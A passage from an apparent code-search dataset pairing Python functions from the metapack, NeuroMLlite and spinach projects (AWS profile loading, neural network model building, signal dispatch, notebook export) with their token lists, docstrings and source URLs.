session = boto3.Session(profile_name=profile_name)
os.environ['AWS_ACCESS_KEY_ID'] = session.get_credentials().access_key
os.environ['AWS_SECRET_ACCESS_KEY'] = session.get_credentials().secret_key | python | def set_s3_profile(profile_name):
"""Load the credentials for an s3 profile into environmental variables"""
import os
session = boto3.Session(profile_name=profile_name)
os.environ['AWS_ACCESS_KEY_ID'] = session.get_credentials().access_key
os.environ['AWS_SECRET_ACCESS_KEY'] = session.get_credentials().secret_key | [
"def",
"set_s3_profile",
"(",
"profile_name",
")",
":",
"import",
"os",
"session",
"=",
"boto3",
".",
"Session",
"(",
"profile_name",
"=",
"profile_name",
")",
"os",
".",
"environ",
"[",
"'AWS_ACCESS_KEY_ID'",
"]",
"=",
"session",
".",
"get_credentials",
"(",
")",
".",
"access_key",
"os",
".",
"environ",
"[",
"'AWS_SECRET_ACCESS_KEY'",
"]",
"=",
"session",
".",
"get_credentials",
"(",
")",
".",
"secret_key"
] | Load the credentials for an s3 profile into environment variables | [
"Load",
"the",
"credentials",
"for",
"an",
"s3",
"profile",
"into",
"environmental",
"variables"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/package/s3.py#L158-L165 |
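A short usage sketch; the profile name 'work' is a placeholder and must exist in the local AWS configuration (e.g. ~/.aws/credentials):

import os
set_s3_profile('work')  # hypothetical profile name
assert 'AWS_ACCESS_KEY_ID' in os.environ and 'AWS_SECRET_ACCESS_KEY' in os.environ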
NeuroML/NeuroMLlite | neuromllite/utils.py | create_new_model | def create_new_model(reference,
duration,
dt=0.025, # ms
temperature=6.3, # degC
default_region=None,
parameters = None,
cell_for_default_population=None,
color_for_default_population='0.8 0 0',
input_for_default_population=None,
synapses=[],
simulation_seed=12345,
network_filename=None,
simulation_filename=None):
################################################################################
### Build a new network
net = Network(id=reference)
net.notes = "A network model: %s"%reference
net.temperature = temperature # degC
if parameters:
net.parameters = parameters
################################################################################
### Add some regions
if default_region:
if type(default_region)==str:
r1 = RectangularRegion(id=default_region, x=0,y=0,z=0,width=1000,height=100,depth=1000)
net.regions.append(r1)
default_region = r1
else:
net.regions.append(default_region)
################################################################################
### Add some cells
if cell_for_default_population:
net.cells.append(cell_for_default_population)
################################################################################
### Add some synapses
for s in synapses:
net.synapses.append(s)
################################################################################
### Add some populations
if cell_for_default_population:
pop = Population(id='pop_%s'%cell_for_default_population.id,
size=1,
component=cell_for_default_population.id,
properties={'color':color_for_default_population})
if default_region:
pop.region = default_region
pop.random_layout = RandomLayout(region=default_region.id)
net.populations.append(pop)
################################################################################
### Add a projection
'''
net.projections.append(Projection(id='proj0',
presynaptic=p0.id,
postsynaptic=p1.id,
synapse='ampa'))
net.projections[0].random_connectivity=RandomConnectivity(probability=0.5)'''
################################################################################
### Add some inputs
if input_for_default_population:
net.input_sources.append(input_for_default_population)
net.inputs.append(Input(id='Stim_%s'%input_for_default_population.id,
input_source=input_for_default_population.id,
population=pop.id,
percentage=100))
################################################################################
### Save to JSON format
net.id = reference
print(net.to_json())
if network_filename==None:
network_filename='%s.json'%net.id
new_file = net.to_json_file(network_filename)
################################################################################
### Build Simulation object & save as JSON
sim = Simulation(id='Sim_%s'%reference,
network=new_file,
duration=duration,
dt=dt,
seed=simulation_seed,
recordTraces={'all':'*'})
if simulation_filename==None:
simulation_filename='%s.json'%sim.id
sim.to_json_file(simulation_filename)
return sim, net | python | def create_new_model(reference,
duration,
dt=0.025, # ms
temperature=6.3, # degC
default_region=None,
parameters = None,
cell_for_default_population=None,
color_for_default_population='0.8 0 0',
input_for_default_population=None,
synapses=[],
simulation_seed=12345,
network_filename=None,
simulation_filename=None):
################################################################################
### Build a new network
net = Network(id=reference)
net.notes = "A network model: %s"%reference
net.temperature = temperature # degC
if parameters:
net.parameters = parameters
################################################################################
### Add some regions
if default_region:
if type(default_region)==str:
r1 = RectangularRegion(id=default_region, x=0,y=0,z=0,width=1000,height=100,depth=1000)
net.regions.append(r1)
default_region = r1
else:
net.regions.append(default_region)
################################################################################
### Add some cells
if cell_for_default_population:
net.cells.append(cell_for_default_population)
################################################################################
### Add some synapses
for s in synapses:
net.synapses.append(s)
################################################################################
### Add some populations
if cell_for_default_population:
pop = Population(id='pop_%s'%cell_for_default_population.id,
size=1,
component=cell_for_default_population.id,
properties={'color':color_for_default_population})
if default_region:
pop.region = default_region
pop.random_layout = RandomLayout(region=default_region.id)
net.populations.append(pop)
################################################################################
### Add a projection
'''
net.projections.append(Projection(id='proj0',
presynaptic=p0.id,
postsynaptic=p1.id,
synapse='ampa'))
net.projections[0].random_connectivity=RandomConnectivity(probability=0.5)'''
################################################################################
### Add some inputs
if input_for_default_population:
net.input_sources.append(input_for_default_population)
net.inputs.append(Input(id='Stim_%s'%input_for_default_population.id,
input_source=input_for_default_population.id,
population=pop.id,
percentage=100))
################################################################################
### Save to JSON format
net.id = reference
print(net.to_json())
if network_filename==None:
network_filename='%s.json'%net.id
new_file = net.to_json_file(network_filename)
################################################################################
### Build Simulation object & save as JSON
sim = Simulation(id='Sim_%s'%reference,
network=new_file,
duration=duration,
dt=dt,
seed=simulation_seed,
recordTraces={'all':'*'})
if simulation_filename==None:
simulation_filename='%s.json'%sim.id
sim.to_json_file(simulation_filename)
return sim, net | [
"def",
"create_new_model",
"(",
"reference",
",",
"duration",
",",
"dt",
"=",
"0.025",
",",
"# ms ",
"temperature",
"=",
"6.3",
",",
"# degC",
"default_region",
"=",
"None",
",",
"parameters",
"=",
"None",
",",
"cell_for_default_population",
"=",
"None",
",",
"color_for_default_population",
"=",
"'0.8 0 0'",
",",
"input_for_default_population",
"=",
"None",
",",
"synapses",
"=",
"[",
"]",
",",
"simulation_seed",
"=",
"12345",
",",
"network_filename",
"=",
"None",
",",
"simulation_filename",
"=",
"None",
")",
":",
"################################################################################",
"### Build a new network",
"net",
"=",
"Network",
"(",
"id",
"=",
"reference",
")",
"net",
".",
"notes",
"=",
"\"A network model: %s\"",
"%",
"reference",
"net",
".",
"temperature",
"=",
"temperature",
"# degC",
"if",
"parameters",
":",
"net",
".",
"parameters",
"=",
"parameters",
"################################################################################",
"### Add some regions",
"if",
"default_region",
":",
"if",
"type",
"(",
"default_region",
")",
"==",
"str",
":",
"r1",
"=",
"RectangularRegion",
"(",
"id",
"=",
"default_region",
",",
"x",
"=",
"0",
",",
"y",
"=",
"0",
",",
"z",
"=",
"0",
",",
"width",
"=",
"1000",
",",
"height",
"=",
"100",
",",
"depth",
"=",
"1000",
")",
"net",
".",
"regions",
".",
"append",
"(",
"r1",
")",
"default_region",
"=",
"r1",
"else",
":",
"net",
".",
"regions",
".",
"append",
"(",
"default_region",
")",
"################################################################################",
"### Add some cells",
"if",
"cell_for_default_population",
":",
"net",
".",
"cells",
".",
"append",
"(",
"cell_for_default_population",
")",
"################################################################################",
"### Add some synapses",
"for",
"s",
"in",
"synapses",
":",
"net",
".",
"synapses",
".",
"append",
"(",
"s",
")",
"################################################################################",
"### Add some populations",
"if",
"cell_for_default_population",
":",
"pop",
"=",
"Population",
"(",
"id",
"=",
"'pop_%s'",
"%",
"cell_for_default_population",
".",
"id",
",",
"size",
"=",
"1",
",",
"component",
"=",
"cell_for_default_population",
".",
"id",
",",
"properties",
"=",
"{",
"'color'",
":",
"color_for_default_population",
"}",
")",
"if",
"default_region",
":",
"pop",
".",
"region",
"=",
"default_region",
"pop",
".",
"random_layout",
"=",
"RandomLayout",
"(",
"region",
"=",
"default_region",
".",
"id",
")",
"net",
".",
"populations",
".",
"append",
"(",
"pop",
")",
"################################################################################",
"### Add a projection",
"################################################################################",
"### Add some inputs",
"if",
"input_for_default_population",
":",
"net",
".",
"input_sources",
".",
"append",
"(",
"input_for_default_population",
")",
"net",
".",
"inputs",
".",
"append",
"(",
"Input",
"(",
"id",
"=",
"'Stim_%s'",
"%",
"input_for_default_population",
".",
"id",
",",
"input_source",
"=",
"input_for_default_population",
".",
"id",
",",
"population",
"=",
"pop",
".",
"id",
",",
"percentage",
"=",
"100",
")",
")",
"################################################################################",
"### Save to JSON format",
"net",
".",
"id",
"=",
"reference",
"print",
"(",
"net",
".",
"to_json",
"(",
")",
")",
"if",
"network_filename",
"==",
"None",
":",
"network_filename",
"=",
"'%s.json'",
"%",
"net",
".",
"id",
"new_file",
"=",
"net",
".",
"to_json_file",
"(",
"network_filename",
")",
"################################################################################",
"### Build Simulation object & save as JSON",
"sim",
"=",
"Simulation",
"(",
"id",
"=",
"'Sim_%s'",
"%",
"reference",
",",
"network",
"=",
"new_file",
",",
"duration",
"=",
"duration",
",",
"dt",
"=",
"dt",
",",
"seed",
"=",
"simulation_seed",
",",
"recordTraces",
"=",
"{",
"'all'",
":",
"'*'",
"}",
")",
"if",
"simulation_filename",
"==",
"None",
":",
"simulation_filename",
"=",
"'%s.json'",
"%",
"sim",
".",
"id",
"sim",
".",
"to_json_file",
"(",
"simulation_filename",
")",
"return",
"sim",
",",
"net"
] | net.projections.append(Projection(id='proj0',
presynaptic=p0.id,
postsynaptic=p1.id,
synapse='ampa'))
net.projections[0].random_connectivity=RandomConnectivity(probability=0.5) | [
"net",
".",
"projections",
".",
"append",
"(",
"Projection",
"(",
"id",
"=",
"proj0",
"presynaptic",
"=",
"p0",
".",
"id",
"postsynaptic",
"=",
"p1",
".",
"id",
"synapse",
"=",
"ampa",
"))"
] | train | https://github.com/NeuroML/NeuroMLlite/blob/f3fa2ff662e40febfa97c045e7f0e6915ad04161/neuromllite/utils.py#L120-L241 |
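A hedged sketch of driving create_new_model. The Cell and InputSource constructor arguments below are assumptions about the neuromllite API (modelled on its PyNN-style examples), and the component ids are placeholders:

from neuromllite import Cell, InputSource

cell = Cell(id='testcell', pynn_cell='IF_cond_alpha')    # assumed kwargs
stim = InputSource(id='iclamp0', pynn_input='DCSource',  # assumed kwargs
                   parameters={'amplitude': 0.2, 'start': 100., 'stop': 400.})

sim, net = create_new_model('TestNet',
                            duration=500,                # ms
                            default_region='region1',
                            cell_for_default_population=cell,
                            input_for_default_population=stim)
# Side effects: TestNet.json (network) and Sim_TestNet.json (simulation)
# are written to the current directory.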
NicolasLM/spinach | spinach/signals.py | SafeNamedSignal.send | def send(self, *sender, **kwargs):
"""Emit this signal on behalf of `sender`, passing on kwargs.
This is an extension of `Signal.send` that changes one thing:
Exceptions raised in calling the receiver are logged but do not fail the dispatch.
"""
if len(sender) == 0:
sender = None
elif len(sender) > 1:
raise TypeError('send() accepts only one positional argument, '
'%s given' % len(sender))
else:
sender = sender[0]
if not self.receivers:
return []
rv = list()
for receiver in self.receivers_for(sender):
try:
rv.append((receiver, receiver(sender, **kwargs)))
except Exception:
logger.exception('Error while dispatching signal "{}" '
'to receiver'.format(self.name))
return rv | python | def send(self, *sender, **kwargs):
"""Emit this signal on behalf of `sender`, passing on kwargs.
This is an extension of `Signal.send` that changes one thing:
Exceptions raised in calling the receiver are logged but do not fail the dispatch.
"""
if len(sender) == 0:
sender = None
elif len(sender) > 1:
raise TypeError('send() accepts only one positional argument, '
'%s given' % len(sender))
else:
sender = sender[0]
if not self.receivers:
return []
rv = list()
for receiver in self.receivers_for(sender):
try:
rv.append((receiver, receiver(sender, **kwargs)))
except Exception:
logger.exception('Error while dispatching signal "{}" '
'to receiver'.format(self.name))
return rv | [
"def",
"send",
"(",
"self",
",",
"*",
"sender",
",",
"*",
"*",
"kwargs",
")",
":",
"if",
"len",
"(",
"sender",
")",
"==",
"0",
":",
"sender",
"=",
"None",
"elif",
"len",
"(",
"sender",
")",
">",
"1",
":",
"raise",
"TypeError",
"(",
"'send() accepts only one positional argument, '",
"'%s given'",
"%",
"len",
"(",
"sender",
")",
")",
"else",
":",
"sender",
"=",
"sender",
"[",
"0",
"]",
"if",
"not",
"self",
".",
"receivers",
":",
"return",
"[",
"]",
"rv",
"=",
"list",
"(",
")",
"for",
"receiver",
"in",
"self",
".",
"receivers_for",
"(",
"sender",
")",
":",
"try",
":",
"rv",
".",
"append",
"(",
"(",
"receiver",
",",
"receiver",
"(",
"sender",
",",
"*",
"*",
"kwargs",
")",
")",
")",
"except",
"Exception",
":",
"logger",
".",
"exception",
"(",
"'Error while dispatching signal \"{}\" '",
"'to receiver'",
".",
"format",
"(",
"self",
".",
"name",
")",
")",
"return",
"rv"
] | Emit this signal on behalf of `sender`, passing on kwargs.
This is an extension of `Signal.send` that changes one thing:
Exceptions raised in calling the receiver are logged but do not fail the dispatch. | [
"Emit",
"this",
"signal",
"on",
"behalf",
"of",
"sender",
"passing",
"on",
"kwargs",
"."
] | train | https://github.com/NicolasLM/spinach/blob/0122f916643101eab5cdc1f3da662b9446e372aa/spinach/signals.py#L16-L40 |
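A small sketch of the fault-tolerant dispatch described in the docstring: the receiver that raises is logged and skipped, so send() still returns the (receiver, value) pair for the healthy one:

sig = SafeNamedSignal('job_started')

def ok_receiver(sender, **kwargs):
    return 'ok'

def broken_receiver(sender, **kwargs):
    raise RuntimeError('boom')  # logged by send(), never propagated

sig.connect(ok_receiver)
sig.connect(broken_receiver)

assert sig.send('worker-1') == [(ok_receiver, 'ok')]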
Metatab/metapack | metapack/jupyter/exporters.py | DocumentationExporter.update_metatab | def update_metatab(self, doc, resources):
"""Add documentation entries for resources"""
if not 'Documentation' in doc:
doc.new_section("Documentation")
ds = doc['Documentation']
if not 'Name' in ds.args:
ds.add_arg('Name', prepend=True)
# This is the main output from the HTML exporter, not a resource.
ds.new_term('Root.Documentation', 'docs/notebook.html', name="notebook.html", title='Jupyter Notebook (HTML)')
for name, data in resources.get('outputs', {}).items():
if name == 'documentation.html':
ds.new_term('Root.Documentation', 'docs/' + name, name=name, title='Primary Documentation (HTML)')
elif name == 'html_basic_body.html':
pass
elif name.endswith('.html'):
ds.new_term('Root.Documentation', 'docs/' + name, name=name, title='Documentation (HTML)')
elif name.endswith('.md'):
ds.new_term('Root.Documentation', 'docs/' + name, name=name, title='Documentation (Markdown)')
elif name.endswith('.pdf'):
ds.new_term('Root.Documentation', 'docs/' + name, name=name, title='Documentation (PDF)')
elif name.endswith('.png'):
ds.new_term('Root.Image', 'docs/' + name, name=name, title='Image for HTML Documentation')
else:
pass | python | def update_metatab(self, doc, resources):
"""Add documentation entries for resources"""
if not 'Documentation' in doc:
doc.new_section("Documentation")
ds = doc['Documentation']
if not 'Name' in ds.args:
ds.add_arg('Name', prepend=True)
# This is the main output from the HTML exporter, not a resource.
ds.new_term('Root.Documentation', 'docs/notebook.html', name="notebook.html", title='Jupyter Notebook (HTML)')
for name, data in resources.get('outputs', {}).items():
if name == 'documentation.html':
ds.new_term('Root.Documentation', 'docs/' + name, name=name, title='Primary Documentation (HTML)')
elif name == 'html_basic_body.html':
pass
elif name.endswith('.html'):
ds.new_term('Root.Documentation', 'docs/' + name, name=name, title='Documentation (HTML)')
elif name.endswith('.md'):
ds.new_term('Root.Documentation', 'docs/' + name, name=name, title='Documentation (Markdown)')
elif name.endswith('.pdf'):
ds.new_term('Root.Documentation', 'docs/' + name, name=name, title='Documentation (PDF)')
elif name.endswith('.png'):
ds.new_term('Root.Image', 'docs/' + name, name=name, title='Image for HTML Documentation')
else:
pass | [
"def",
"update_metatab",
"(",
"self",
",",
"doc",
",",
"resources",
")",
":",
"if",
"not",
"'Documentation'",
"in",
"doc",
":",
"doc",
".",
"new_section",
"(",
"\"Documentation\"",
")",
"ds",
"=",
"doc",
"[",
"'Documentation'",
"]",
"if",
"not",
"'Name'",
"in",
"ds",
".",
"args",
":",
"ds",
".",
"add_arg",
"(",
"'Name'",
",",
"prepend",
"=",
"True",
")",
"# This is the main output from the HTML exporter, not a resource.",
"ds",
".",
"new_term",
"(",
"'Root.Documentation'",
",",
"'docs/notebook.html'",
",",
"name",
"=",
"\"notebook.html\"",
",",
"title",
"=",
"'Jupyter Notebook (HTML)'",
")",
"for",
"name",
",",
"data",
"in",
"resources",
".",
"get",
"(",
"'outputs'",
",",
"{",
"}",
")",
".",
"items",
"(",
")",
":",
"if",
"name",
"==",
"'documentation.html'",
":",
"ds",
".",
"new_term",
"(",
"'Root.Documentation'",
",",
"'docs/'",
"+",
"name",
",",
"name",
"=",
"name",
",",
"title",
"=",
"'Primary Documentation (HTML)'",
")",
"elif",
"name",
"==",
"'html_basic_body.html'",
":",
"pass",
"elif",
"name",
".",
"endswith",
"(",
"'.html'",
")",
":",
"ds",
".",
"new_term",
"(",
"'Root.Documentation'",
",",
"'docs/'",
"+",
"name",
",",
"name",
"=",
"name",
",",
"title",
"=",
"'Documentation (HTML)'",
")",
"elif",
"name",
".",
"endswith",
"(",
"'.md'",
")",
":",
"ds",
".",
"new_term",
"(",
"'Root.Documentation'",
",",
"'docs/'",
"+",
"name",
",",
"name",
"=",
"name",
",",
"title",
"=",
"'Documentation (Markdown)'",
")",
"elif",
"name",
".",
"endswith",
"(",
"'.pdf'",
")",
":",
"ds",
".",
"new_term",
"(",
"'Root.Documentation'",
",",
"'docs/'",
"+",
"name",
",",
"name",
"=",
"name",
",",
"title",
"=",
"'Documentation (PDF)'",
")",
"elif",
"name",
".",
"endswith",
"(",
"'.png'",
")",
":",
"ds",
".",
"new_term",
"(",
"'Root.Image'",
",",
"'docs/'",
"+",
"name",
",",
"name",
"=",
"name",
",",
"title",
"=",
"'Image for HTML Documentation'",
")",
"else",
":",
"pass"
] | Add documentation entries for resources | [
"Add",
"documentation",
"entries",
"for",
"resources"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/jupyter/exporters.py#L187-L218 |
Metatab/metapack | metapack/jupyter/exporters.py | NotebookExecutor.get_package_dir_name | def get_package_dir_name(self, nb):
"""This is the name of the package we will be creating. """
package_dir = self.package_dir
if not package_dir:
package_dir = getcwd()
package_name = self.package_name
if not package_name:
doc = ExtractInlineMetatabDoc(package_url="metapack+file:" + package_dir).run(nb)
if not doc:
raise NotebookError("Notebook does not have an inline metatab doc")
t = doc.find_first('Root.Name', section='Root')
if not t:
raise NotebookError("Inline Metatab doc doesnt have a Root.Name term")
package_name = doc.as_version(None)
return package_dir, package_name | python | def get_package_dir_name(self, nb):
"""This is the name of the package we will be creating. """
package_dir = self.package_dir
if not package_dir:
package_dir = getcwd()
package_name = self.package_name
if not package_name:
doc = ExtractInlineMetatabDoc(package_url="metapack+file:" + package_dir).run(nb)
if not doc:
raise NotebookError("Notebook does not have an inline metatab doc")
t = doc.find_first('Root.Name', section='Root')
if not t:
raise NotebookError("Inline Metatab doc doesnt have a Root.Name term")
package_name = doc.as_version(None)
return package_dir, package_name | [
"def",
"get_package_dir_name",
"(",
"self",
",",
"nb",
")",
":",
"package_dir",
"=",
"self",
".",
"package_dir",
"if",
"not",
"package_dir",
":",
"package_dir",
"=",
"getcwd",
"(",
")",
"package_name",
"=",
"self",
".",
"package_name",
"if",
"not",
"package_name",
":",
"doc",
"=",
"ExtractInlineMetatabDoc",
"(",
"package_url",
"=",
"\"metapack+file:\"",
"+",
"package_dir",
")",
".",
"run",
"(",
"nb",
")",
"if",
"not",
"doc",
":",
"raise",
"NotebookError",
"(",
"\"Notebook does not have an inline metatab doc\"",
")",
"t",
"=",
"doc",
".",
"find_first",
"(",
"'Root.Name'",
",",
"section",
"=",
"'Root'",
")",
"if",
"not",
"t",
":",
"raise",
"NotebookError",
"(",
"\"Inline Metatab doc doesnt have a Root.Name term\"",
")",
"package_name",
"=",
"doc",
".",
"as_version",
"(",
"None",
")",
"return",
"package_dir",
",",
"package_name"
] | This is the name of the package we will be creating. | [
"This",
"is",
"the",
"name",
"of",
"the",
"package",
"we",
"will",
"be",
"creating",
"."
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/jupyter/exporters.py#L248-L271 |
Metatab/metapack | metapack/jupyter/exporters.py | NotebookExecutor.get_output_dir | def get_output_dir(self, nb):
"""Open a notebook and determine the output directory from the name"""
self.package_dir, self.package_name = self.get_package_dir_name(nb)
return join(self.package_dir, self.package_name) | python | def get_output_dir(self, nb):
"""Open a notebook and determine the output directory from the name"""
self.package_dir, self.package_name = self.get_package_dir_name(nb)
return join(self.package_dir, self.package_name) | [
"def",
"get_output_dir",
"(",
"self",
",",
"nb",
")",
":",
"self",
".",
"package_dir",
",",
"self",
".",
"package_name",
"=",
"self",
".",
"get_package_dir_name",
"(",
"nb",
")",
"return",
"join",
"(",
"self",
".",
"package_dir",
",",
"self",
".",
"package_name",
")"
] | Open a notebook and determine the output directory from the name | [
"Open",
"a",
"notebook",
"and",
"determine",
"the",
"output",
"directory",
"from",
"the",
"name"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/jupyter/exporters.py#L273-L277 |
Metatab/metapack | metapack/jupyter/exporters.py | NotebookExecutor.extract_terms | def extract_terms(self, nb):
"""Extract some term values, usually set with tags or metadata"""
emt = ExtractMetatabTerms()
emt.preprocess(nb, {})
return emt.terms | python | def extract_terms(self, nb):
"""Extract some term values, usually set with tags or metadata"""
emt = ExtractMetatabTerms()
emt.preprocess(nb, {})
return emt.terms | [
"def",
"extract_terms",
"(",
"self",
",",
"nb",
")",
":",
"emt",
"=",
"ExtractMetatabTerms",
"(",
")",
"emt",
".",
"preprocess",
"(",
"nb",
",",
"{",
"}",
")",
"return",
"emt",
".",
"terms"
] | Extract some term values, usually set with tags or metadata | [
"Extract",
"some",
"term",
"values",
"usually",
"set",
"with",
"tags",
"or",
"metadata"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/jupyter/exporters.py#L279-L284 |
Metatab/metapack | metapack/jupyter/exporters.py | NotebookExecutor.from_notebook_node | def from_notebook_node(self, nb, resources=None, **kw):
"""Create a Metatab package from a notebook node """
nb_copy = copy.deepcopy(nb)
# Get the package name and directory, either from the inlined Metatab doc,
# or from the config
try:
self.output_dir = self.get_output_dir(nb)
except NotebookError as e:
# Notebook probably lacks a metatab doc.
self.log.fatal(e)
sys.exit(1)
assert self.output_dir
resources = self._init_resources(resources)
resources['outputs'] = {}
if 'language' in nb['metadata']:
resources['language'] = nb['metadata']['language'].lower()
# Do any other configured preprocessing
nb_copy, resources = self._preprocess(nb_copy, resources)
# The Notebook can set some terms with tags
self.extra_terms = self.extract_terms(nb_copy)
# Clear the output before executing
self.clear_output(nb_copy)
nb_copy, resources = self.exec_notebook(nb_copy, resources, self.notebook_dir)
eld = ExtractLibDirs()
eld.preprocess(nb_copy, {})
self.lib_dirs = eld.lib_dirs
efm = ExtractFinalMetatabDoc()
efm.preprocess(nb_copy, {})
if not efm.doc:
raise MetapackError("No metatab doc")
self.doc = efm.doc
for section, term, value in self.extra_terms:
self.doc[section].get_or_new_term(term, value)
nb, _ = RemoveMetatab().preprocess(nb, {})
resources['outputs']['notebooks/{}.ipynb'.format(self.package_name)] = nbformat.writes(nb).encode('utf-8')
return efm.doc.as_csv(), resources | python | def from_notebook_node(self, nb, resources=None, **kw):
"""Create a Metatab package from a notebook node """
nb_copy = copy.deepcopy(nb)
# Get the package name and directory, either from the inlined Metatab doc,
# or from the config
try:
self.output_dir = self.get_output_dir(nb)
except NotebookError as e:
# Notebook probably lacks a metatab doc.
self.log.fatal(e)
sys.exit(1)
assert self.output_dir
resources = self._init_resources(resources)
resources['outputs'] = {}
if 'language' in nb['metadata']:
resources['language'] = nb['metadata']['language'].lower()
# Do any other configured preprocessing
nb_copy, resources = self._preprocess(nb_copy, resources)
# The Notebook can set some terms with tags
self.extra_terms = self.extract_terms(nb_copy)
# Clear the output before executing
self.clear_output(nb_copy)
nb_copy, resources = self.exec_notebook(nb_copy, resources, self.notebook_dir)
eld = ExtractLibDirs()
eld.preprocess(nb_copy, {})
self.lib_dirs = eld.lib_dirs
efm = ExtractFinalMetatabDoc()
efm.preprocess(nb_copy, {})
if not efm.doc:
raise MetapackError("No metatab doc")
self.doc = efm.doc
for section, term, value in self.extra_terms:
self.doc[section].get_or_new_term(term, value)
nb, _ = RemoveMetatab().preprocess(nb, {})
resources['outputs']['notebooks/{}.ipynb'.format(self.package_name)] = nbformat.writes(nb).encode('utf-8')
return efm.doc.as_csv(), resources | [
"def",
"from_notebook_node",
"(",
"self",
",",
"nb",
",",
"resources",
"=",
"None",
",",
"*",
"*",
"kw",
")",
":",
"nb_copy",
"=",
"copy",
".",
"deepcopy",
"(",
"nb",
")",
"# The the package name and directory, either from the inlined Metatab doc,",
"# or from the config",
"try",
":",
"self",
".",
"output_dir",
"=",
"self",
".",
"get_output_dir",
"(",
"nb",
")",
"except",
"NotebookError",
"as",
"e",
":",
"# Notebook probably lacks a metatab doc.",
"self",
".",
"log",
".",
"fatal",
"(",
"e",
")",
"sys",
".",
"exit",
"(",
"1",
")",
"assert",
"self",
".",
"output_dir",
"resources",
"=",
"self",
".",
"_init_resources",
"(",
"resources",
")",
"resources",
"[",
"'outputs'",
"]",
"=",
"{",
"}",
"if",
"'language'",
"in",
"nb",
"[",
"'metadata'",
"]",
":",
"resources",
"[",
"'language'",
"]",
"=",
"nb",
"[",
"'metadata'",
"]",
"[",
"'language'",
"]",
".",
"lower",
"(",
")",
"# Do any other configured preprocessing",
"nb_copy",
",",
"resources",
"=",
"self",
".",
"_preprocess",
"(",
"nb_copy",
",",
"resources",
")",
"# The Notebook can set some terms with tags",
"self",
".",
"extra_terms",
"=",
"self",
".",
"extract_terms",
"(",
"nb_copy",
")",
"# Clear the output before executing",
"self",
".",
"clear_output",
"(",
"nb_copy",
")",
"nb_copy",
",",
"resources",
"=",
"self",
".",
"exec_notebook",
"(",
"nb_copy",
",",
"resources",
",",
"self",
".",
"notebook_dir",
")",
"eld",
"=",
"ExtractLibDirs",
"(",
")",
"eld",
".",
"preprocess",
"(",
"nb_copy",
",",
"{",
"}",
")",
"self",
".",
"lib_dirs",
"=",
"eld",
".",
"lib_dirs",
"efm",
"=",
"ExtractFinalMetatabDoc",
"(",
")",
"efm",
".",
"preprocess",
"(",
"nb_copy",
",",
"{",
"}",
")",
"if",
"not",
"efm",
".",
"doc",
":",
"raise",
"MetapackError",
"(",
"\"No metatab doc\"",
")",
"self",
".",
"doc",
"=",
"efm",
".",
"doc",
"for",
"section",
",",
"term",
",",
"value",
"in",
"self",
".",
"extra_terms",
":",
"self",
".",
"doc",
"[",
"section",
"]",
".",
"get_or_new_term",
"(",
"term",
",",
"value",
")",
"nb",
",",
"_",
"=",
"RemoveMetatab",
"(",
")",
".",
"preprocess",
"(",
"nb",
",",
"{",
"}",
")",
"resources",
"[",
"'outputs'",
"]",
"[",
"'notebooks/{}.ipynb'",
".",
"format",
"(",
"self",
".",
"package_name",
")",
"]",
"=",
"nbformat",
".",
"writes",
"(",
"nb",
")",
".",
"encode",
"(",
"'utf-8'",
")",
"return",
"efm",
".",
"doc",
".",
"as_csv",
"(",
")",
",",
"resources"
] | Create a Metatab package from a notebook node | [
"Create",
"a",
"Metatab",
"package",
"from",
"a",
"notebook",
"node"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/jupyter/exporters.py#L292-L347 |
Metatab/metapack | metapack/jupyter/exporters.py | HugoOutputExtractor.preprocess_cell | def preprocess_cell(self, cell, resources, cell_index):
"""Also extracts attachments"""
from nbformat.notebooknode import NotebookNode
attach_names = []
# Just move the attachment into an output
for k, attach in cell.get('attachments', {}).items():
for mime_type in self.extract_output_types:
if mime_type in attach:
if not 'outputs' in cell:
cell['outputs'] = []
o = NotebookNode({
'data': NotebookNode({mime_type: attach[mime_type]}),
'metadata': NotebookNode({
'filenames': {mime_type: k} # Will get re-written
}),
'output_type': 'display_data'
})
cell['outputs'].append(o)
attach_names.append((mime_type, k))
nb, resources = super().preprocess_cell(cell, resources, cell_index)
output_names = list(resources.get('outputs', {}).keys())
if attach_names:
# We're going to assume that attachments are only on Markdown cells, and Markdown cells
# can't generate output, so all of the outputs were added.
# reverse + zip matches the last len(attach_names) elements from output_names
for output_name, (mimetype, an) in zip(reversed(output_names), reversed(attach_names)):
# We'll post process to set the final output directory
cell.source = re.sub('\(attachment:{}\)'.format(an),
'(__IMGDIR__/{})'.format(output_name), cell.source)
return nb, resources | python | def preprocess_cell(self, cell, resources, cell_index):
"""Also extracts attachments"""
from nbformat.notebooknode import NotebookNode
attach_names = []
# Just move the attachment into an output
for k, attach in cell.get('attachments', {}).items():
for mime_type in self.extract_output_types:
if mime_type in attach:
if not 'outputs' in cell:
cell['outputs'] = []
o = NotebookNode({
'data': NotebookNode({mime_type: attach[mime_type]}),
'metadata': NotebookNode({
'filenames': {mime_type: k} # Will get re-written
}),
'output_type': 'display_data'
})
cell['outputs'].append(o)
attach_names.append((mime_type, k))
nb, resources = super().preprocess_cell(cell, resources, cell_index)
output_names = list(resources.get('outputs', {}).keys())
if attach_names:
# We're going to assume that attachments are only on Markdown cells, and Markdown cells
# can't generate output, so all of the outputs were added.
# reverse + zip matches the last len(attach_names) elements from output_names
for output_name, (mimetype, an) in zip(reversed(output_names), reversed(attach_names)):
# We'll post process to set the final output directory
cell.source = re.sub('\(attachment:{}\)'.format(an),
'(__IMGDIR__/{})'.format(output_name), cell.source)
return nb, resources | [
"def",
"preprocess_cell",
"(",
"self",
",",
"cell",
",",
"resources",
",",
"cell_index",
")",
":",
"from",
"nbformat",
".",
"notebooknode",
"import",
"NotebookNode",
"attach_names",
"=",
"[",
"]",
"# Just move the attachment into an output",
"for",
"k",
",",
"attach",
"in",
"cell",
".",
"get",
"(",
"'attachments'",
",",
"{",
"}",
")",
".",
"items",
"(",
")",
":",
"for",
"mime_type",
"in",
"self",
".",
"extract_output_types",
":",
"if",
"mime_type",
"in",
"attach",
":",
"if",
"not",
"'outputs'",
"in",
"cell",
":",
